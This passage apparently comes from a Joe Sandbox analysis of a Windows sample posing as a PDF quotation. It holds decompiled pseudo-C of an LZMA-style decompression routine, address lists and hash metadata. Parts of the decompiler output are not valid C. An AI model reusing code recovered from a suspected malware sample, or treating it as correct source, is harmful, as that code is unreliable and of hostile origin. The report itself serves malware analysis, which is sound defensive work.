                												 *(__ebp - 0x88) = 0x10;
                												goto L170;
                											}
                											L110:
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t365 = __ebp - 0x70;
                											 *_t365 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t365;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											goto L111;
                										case 0x11:
                											L69:
                											__esi =  *(__ebp - 0x58);
                											 *(__ebp - 0x84) = 0x12;
                											goto L132;
                										case 0x12:
                											L128:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												L131:
                												__eax =  *(__ebp - 0x58);
                												 *(__ebp - 0x84) = 0x13;
                												__esi =  *(__ebp - 0x58) + 2;
                												L132:
                												 *(_t644 - 0x54) = _t642;
                												goto L133;
                											}
                											L129:
                											__eax =  *(__ebp - 0x4c);
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											__eflags = __eax;
                											__eax =  *(__ebp - 0x58) + __eax + 4;
                											goto L130;
                										case 0x13:
                											L141:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												L143:
                												_t469 = __ebp - 0x58;
                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                												__eflags =  *_t469;
                												 *(__ebp - 0x30) = 0x10;
                												 *(__ebp - 0x40) = 8;
                												L144:
                												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                												L145:
                												 *(_t644 - 0x50) = 1;
                												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                												goto L149;
                											}
                											L142:
                											__eax =  *(__ebp - 0x4c);
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											 *(__ebp - 0x30) = 8;
                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                											L130:
                											 *(__ebp - 0x58) = __eax;
                											 *(__ebp - 0x40) = 3;
                											goto L144;
                										case 0x14:
                											L156:
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                											__eax =  *(__ebp - 0x80);
                											while(1) {
                												L140:
                												 *(_t644 - 0x88) = _t537;
                												goto L1;
                											}
                										case 0x15:
                											L91:
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                											__al = __al & 0x000000fd;
                											__eax = (__eflags >= 0) - 1 + 0xb;
                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                											goto L120;
                										case 0x16:
                											goto L0;
                										case 0x17:
                											while(1) {
                												L145:
                												 *(_t644 - 0x50) = 1;
                												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                												goto L149;
                											}
                										case 0x18:
                											goto L146;
                										case 0x19:
                											L94:
                											__eflags = __ebx - 4;
                											if(__ebx < 4) {
                												L98:
                												 *(__ebp - 0x2c) = __ebx;
                												L119:
                												_t393 = __ebp - 0x2c;
                												 *_t393 =  *(__ebp - 0x2c) + 1;
                												__eflags =  *_t393;
                												L120:
                												__eax =  *(__ebp - 0x2c);
                												__eflags = __eax;
                												if(__eax == 0) {
                													L166:
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                													goto L170;
                												}
                												L121:
                												__eflags = __eax -  *(__ebp - 0x60);
                												if(__eax >  *(__ebp - 0x60)) {
                													goto L171;
                												}
                												L122:
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                												__eax =  *(__ebp - 0x30);
                												_t400 = __ebp - 0x60;
                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                												__eflags =  *_t400;
                												goto L123;
                											}
                											L95:
                											__ecx = __ebx;
                											__eax = __ebx;
                											__ecx = __ebx >> 1;
                											__eax = __ebx & 0x00000001;
                											__ecx = (__ebx >> 1) - 1;
                											__al = __al | 0x00000002;
                											__eax = (__ebx & 0x00000001) << __cl;
                											__eflags = __ebx - 0xe;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ebx >= 0xe) {
                												L97:
                												__ebx = 0;
                												 *(__ebp - 0x48) = __ecx;
                												L102:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													L107:
                													__eax = __eax + __ebx;
                													 *(__ebp - 0x40) = 4;
                													 *(__ebp - 0x2c) = __eax;
                													__eax =  *(__ebp - 4);
                													__eax =  *(__ebp - 4) + 0x644;
                													__eflags = __eax;
                													L108:
                													__ebx = 0;
                													 *(__ebp - 0x58) = __eax;
                													 *(__ebp - 0x50) = 1;
                													 *(__ebp - 0x44) = 0;
                													 *(__ebp - 0x48) = 0;
                													L112:
                													__eax =  *(__ebp - 0x40);
                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                														L118:
                														_t391 = __ebp - 0x2c;
                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                														__eflags =  *_t391;
                														goto L119;
                													}
                													L113:
                													__eax =  *(__ebp - 0x50);
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                													__eax =  *(__ebp - 0x58);
                													__esi = __edi + __eax;
                													 *(__ebp - 0x54) = __esi;
                													__ax =  *__esi;
                													__ecx = __ax & 0x0000ffff;
                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                													__eflags =  *(__ebp - 0xc) - __edx;
                													if( *(__ebp - 0xc) >= __edx) {
                														__ecx = 0;
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                														__ecx = 1;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                														__ebx = 1;
                														__ecx =  *(__ebp - 0x48);
                														__ebx = 1 << __cl;
                														__ecx = 1 << __cl;
                														__ebx =  *(__ebp - 0x44);
                														__ebx =  *(__ebp - 0x44) | __ecx;
                														__cx = __ax;
                														__cx = __ax >> 5;
                														__eax = __eax - __ecx;
                														__edi = __edi + 1;
                														__eflags = __edi;
                														 *(__ebp - 0x44) = __ebx;
                														 *__esi = __ax;
                														 *(__ebp - 0x50) = __edi;
                													} else {
                														 *(__ebp - 0x10) = __edx;
                														0x800 = 0x800 - __ecx;
                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                														 *__esi = __dx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L111:
                														_t368 = __ebp - 0x48;
                														 *_t368 =  *(__ebp - 0x48) + 1;
                														__eflags =  *_t368;
                														goto L112;
                													} else {
                														L117:
                														goto L109;
                													}
                												}
                												L103:
                												__ecx =  *(__ebp - 0xc);
                												__ebx = __ebx + __ebx;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                													__ecx =  *(__ebp - 0x10);
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													__ebx = __ebx | 0x00000001;
                													__eflags = __ebx;
                													 *(__ebp - 0x44) = __ebx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													L101:
                													_t338 = __ebp - 0x48;
                													 *_t338 =  *(__ebp - 0x48) - 1;
                													__eflags =  *_t338;
                													goto L102;
                												} else {
                													L106:
                													goto L99;
                												}
                											}
                											L96:
                											__edx =  *(__ebp - 4);
                											__eax = __eax - __ebx;
                											 *(__ebp - 0x40) = __ecx;
                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                											goto L108;
                										case 0x1a:
                											L56:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												L162:
                												 *(__ebp - 0x88) = 0x1a;
                												goto L170;
                											}
                											L57:
                											__ecx =  *(__ebp - 0x68);
                											__al =  *(__ebp - 0x5c);
                											__edx =  *(__ebp - 8);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                											 *( *(__ebp - 0x68)) = __al;
                											__ecx =  *(__ebp - 0x14);
                											 *(__ecx +  *(__ebp - 8)) = __al;
                											__eax = __ecx + 1;
                											__edx = 0;
                											_t192 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t192;
                											goto L80;
                										case 0x1b:
                											L76:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												L163:
                												 *(__ebp - 0x88) = 0x1b;
                												goto L170;
                											}
                											L77:
                											__eax =  *(__ebp - 0x14);
                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                											__eflags = __eax -  *(__ebp - 0x74);
                											if(__eax >=  *(__ebp - 0x74)) {
                												__eax = __eax +  *(__ebp - 0x74);
                												__eflags = __eax;
                											}
                											__edx =  *(__ebp - 8);
                											__cl =  *(__eax + __edx);
                											__eax =  *(__ebp - 0x14);
                											 *(__ebp - 0x5c) = __cl;
                											 *(__eax + __edx) = __cl;
                											__eax = __eax + 1;
                											__edx = 0;
                											_t275 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t275;
                											__eax =  *(__ebp - 0x68);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											_t284 = __ebp - 0x64;
                											 *_t284 =  *(__ebp - 0x64) - 1;
                											__eflags =  *_t284;
                											 *( *(__ebp - 0x68)) = __cl;
                											L80:
                											 *(__ebp - 0x14) = __edx;
                											goto L81;
                										case 0x1c:
                											while(1) {
                												L123:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													break;
                												}
                												L124:
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t414 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t414;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                												__eflags =  *(__ebp - 0x30);
                												 *( *(__ebp - 0x68)) = __cl;
                												 *(__ebp - 0x14) = _t414;
                												if( *(__ebp - 0x30) > 0) {
                													continue;
                												} else {
                													L127:
                													L81:
                													 *(__ebp - 0x88) = 2;
                													goto L1;
                												}
                											}
                											L167:
                											 *(__ebp - 0x88) = 0x1c;
                											goto L170;
                									}
                								}
                								L171:
                								_t539 = _t538 | 0xffffffff;
                								goto L172;
                							}
                						}
                					}
                				}
                			}















                0x00406833
                0x00406734
                0x00406734
                0x00406734
                0x00000000
                0x0040673a
                0x00000000
                0x0040646a
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x0040678a
                0x00000000
                0x00000000
                0x00000000
                0x004064af
                0x004064af
                0x004064b2
                0x004064e8
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x00406548
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004067b4
                0x0040677d

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00406682() {
                				void _t533;
                				signed int _t534;
                				signed int _t535;
                				signed int* _t605;
                				void* _t612;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t612 - 0x40) != 0) {
                						 *(_t612 - 0x84) = 0x13;
                						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                						goto L132;
                					} else {
                						__eax =  *(__ebp - 0x4c);
                						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                						__ecx =  *(__ebp - 0x58);
                						__eax =  *(__ebp - 0x4c) << 4;
                						__eax =  *(__ebp - 0x58) + __eax + 4;
                						L130:
                						 *(__ebp - 0x58) = __eax;
                						 *(__ebp - 0x40) = 3;
                						L144:
                						 *(__ebp - 0x7c) = 0x14;
                						L145:
                						__eax =  *(__ebp - 0x40);
                						 *(__ebp - 0x50) = 1;
                						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                						L149:
                						if( *(__ebp - 0x48) <= 0) {
                							__ecx =  *(__ebp - 0x40);
                							__ebx =  *(__ebp - 0x50);
                							0 = 1;
                							__eax = 1 << __cl;
                							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                							__eax =  *(__ebp - 0x7c);
                							 *(__ebp - 0x44) = __ebx;
                							while(1) {
                								L140:
                								 *(_t612 - 0x88) = _t533;
                								while(1) {
                									L1:
                									_t534 =  *(_t612 - 0x88);
                									if(_t534 > 0x1c) {
                										break;
                									}
                									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                										case 0:
                											if( *(_t612 - 0x6c) == 0) {
                												goto L170;
                											}
                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                											_t534 =  *( *(_t612 - 0x70));
                											if(_t534 > 0xe1) {
                												goto L171;
                											}
                											_t538 = _t534 & 0x000000ff;
                											_push(0x2d);
                											asm("cdq");
                											_pop(_t569);
                											_push(9);
                											_pop(_t570);
                											_t608 = _t538 / _t569;
                											_t540 = _t538 % _t569 & 0x000000ff;
                											asm("cdq");
                											_t603 = _t540 % _t570 & 0x000000ff;
                											 *(_t612 - 0x3c) = _t603;
                											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                											_t611 = (0x300 << _t603 + _t608) + 0x736;
                											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                												L10:
                												if(_t611 == 0) {
                													L12:
                													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                													goto L15;
                												} else {
                													goto L11;
                												}
                												do {
                													L11:
                													_t611 = _t611 - 1;
                													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                												} while (_t611 != 0);
                												goto L12;
                											}
                											if( *(_t612 - 4) != 0) {
                												GlobalFree( *(_t612 - 4));
                											}
                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                											 *(_t612 - 4) = _t534;
                											if(_t534 == 0) {
                												goto L171;
                											} else {
                												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                												goto L10;
                											}
                										case 1:
                											L13:
                											__eflags =  *(_t612 - 0x6c);
                											if( *(_t612 - 0x6c) == 0) {
                												 *(_t612 - 0x88) = 1;
                												goto L170;
                											}
                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                											_t45 = _t612 - 0x48;
                											 *_t45 =  *(_t612 - 0x48) + 1;
                											__eflags =  *_t45;
                											L15:
                											if( *(_t612 - 0x48) < 4) {
                												goto L13;
                											}
                											_t546 =  *(_t612 - 0x40);
                											if(_t546 ==  *(_t612 - 0x74)) {
                												L20:
                												 *(_t612 - 0x48) = 5;
                												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                												goto L23;
                											}
                											 *(_t612 - 0x74) = _t546;
                											if( *(_t612 - 8) != 0) {
                												GlobalFree( *(_t612 - 8));
                											}
                											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                											 *(_t612 - 8) = _t534;
                											if(_t534 == 0) {
                												goto L171;
                											} else {
                												goto L20;
                											}
                										case 2:
                											L24:
                											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                											 *(_t612 - 0x84) = 6;
                											 *(_t612 - 0x4c) = _t553;
                											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                											goto L132;
                										case 3:
                											L21:
                											__eflags =  *(_t612 - 0x6c);
                											if( *(_t612 - 0x6c) == 0) {
                												 *(_t612 - 0x88) = 3;
                												goto L170;
                											}
                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                											_t67 = _t612 - 0x70;
                											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                											__eflags =  *_t67;
                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                											L23:
                											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                											if( *(_t612 - 0x48) != 0) {
                												goto L21;
                											}
                											goto L24;
                										case 4:
                											L133:
                											_t531 =  *_t605;
                											_t588 = _t531 & 0x0000ffff;
                											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                											if( *(_t612 - 0xc) >= _t564) {
                												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                												 *(_t612 - 0x40) = 1;
                												_t532 = _t531 - (_t531 >> 5);
                												__eflags = _t532;
                												 *_t605 = _t532;
                											} else {
                												 *(_t612 - 0x10) = _t564;
                												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                											}
                											if( *(_t612 - 0x10) >= 0x1000000) {
                												goto L139;
                											} else {
                												goto L137;
                											}
                										case 5:
                											L137:
                											if( *(_t612 - 0x6c) == 0) {
                												 *(_t612 - 0x88) = 5;
                												goto L170;
                											}
                											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                											L139:
                											_t533 =  *(_t612 - 0x84);
                											goto L140;
                										case 6:
                											__edx = 0;
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) = 1;
                												 *(__ebp - 0x84) = 7;
                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                												goto L132;
                											}
                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                											__esi =  *(__ebp - 0x60);
                											__cl = 8;
                											__cl = 8 -  *(__ebp - 0x3c);
                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                											__ecx =  *(__ebp - 0x3c);
                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                											__ecx =  *(__ebp - 4);
                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                											__eflags =  *(__ebp - 0x38) - 4;
                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											if( *(__ebp - 0x38) >= 4) {
                												__eflags =  *(__ebp - 0x38) - 0xa;
                												if( *(__ebp - 0x38) >= 0xa) {
                													_t98 = __ebp - 0x38;
                													 *_t98 =  *(__ebp - 0x38) - 6;
                													__eflags =  *_t98;
                												} else {
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                												}
                											} else {
                												 *(__ebp - 0x38) = 0;
                											}
                											__eflags =  *(__ebp - 0x34) - __edx;
                											if( *(__ebp - 0x34) == __edx) {
                												__ebx = 0;
                												__ebx = 1;
                												goto L61;
                											} else {
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__ecx =  *(__ebp - 8);
                												__ebx = 0;
                												__ebx = 1;
                												__al =  *((intOrPtr*)(__eax + __ecx));
                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                												goto L41;
                											}
                										case 7:
                											__eflags =  *(__ebp - 0x40) - 1;
                											if( *(__ebp - 0x40) != 1) {
                												__eax =  *(__ebp - 0x24);
                												 *(__ebp - 0x80) = 0x16;
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												__eax =  *(__ebp - 0x2c);
                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xa;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                												__eax =  *(__ebp - 4);
                												__eax =  *(__ebp - 4) + 0x664;
                												__eflags = __eax;
                												 *(__ebp - 0x58) = __eax;
                												goto L69;
                											}
                											__eax =  *(__ebp - 4);
                											__ecx =  *(__ebp - 0x38);
                											 *(__ebp - 0x84) = 8;
                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                											goto L132;
                										case 8:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xa;
                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                											} else {
                												__eax =  *(__ebp - 0x38);
                												__ecx =  *(__ebp - 4);
                												__eax =  *(__ebp - 0x38) + 0xf;
                												 *(__ebp - 0x84) = 9;
                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
